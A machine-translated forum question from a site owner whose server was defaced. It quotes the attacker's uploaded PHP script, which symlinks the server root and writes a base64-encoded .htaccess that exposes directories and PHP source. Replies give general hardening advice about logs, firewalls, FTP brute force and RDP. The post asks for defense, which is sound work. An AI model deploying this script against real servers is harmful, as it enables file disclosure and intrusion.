How to protect attack site

Asked

Viewed 623 times

1

Recently I was the target of an attack on my site, this attack defaced my server, was uploaded and then ran this script, see:

if (isset($_POST['red'])){ 

system('ln -s / red.txt'); 
$fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw'; 
$file = fopen(".htaccess","w+"); 
$write = fwrite ($file ,base64_decode($fvckem)); 
$red = symlink("/","red.txt"); 

$rt="

Bypassed Successfully"; 

echo "

Feito .. !

Servidor desconfigurado. 
$rt";

}

From the little knowledge I have it seemed an attack by .htaccess, I wonder, how can I protect myself from new possible attacks?

php security-guard

  • you leave open doors to reach your server, have terminal service, ssh, ftp, somewhere the hacker entered, take a look at the logs and see if you had any access of this type outside of normal hours, or some external ip accessing the server.

  • 1

    Before hand I recommend to make a firewall that blocks any external access to the server, leaves accessible only in the local network, and exchange passwords

  • Hello @Sneeps Ninja access via ftp to send the pages to the server

  • so in ftp there are N ways to do brute force or dictionary, check if there are any security implementation type 3 error attempts then start to drop, in linux from p/ make via iptables

  • Another important tip is that the client machine (which connects to the server) may have some trojan that picks up passwords, keeps an eye out, sniffs everything

1 answer

2


I’m going to talk about a possible flaw, we’d have to take a closer look at your case to see if that fits.

Gross force at terminal service: http://www.pedropereira.net/terminal-services-rdp-brute-force/

It scares me microsoft not to have implemented a security can be forcing the door 3389 in a sneaky way and we have many old cases of this type https://www.linkedin.com/grp/post/112919-89820598

The recommendation of experts http://blogs.technet.com/b/risco/archive/2012/03/16/201-necess-225-ria-a-instala-231-227-o-do-ms12-020-o-mais-r-225-pido-poss-237-vel.aspx

  1. Do not use the service because it is not safe
  2. Then if it is still really necessary then Lock TCP port 3389 in the enterprise perimeter firewall
  3. Turn on Network Level Authentication, which wouldn’t prevent brute force, just make it a little harder to attack.

See an example of brute force access attempt on windows server, this was recent. You can see that it’s a lot of failed attempts and a lot of followed-up attempts that prove that we have a brute-force attempt in this case.

inserir a descrição da imagem aqui

Browser other questions tagged php security-guard

You are not signed in. Login or sign up in order to post.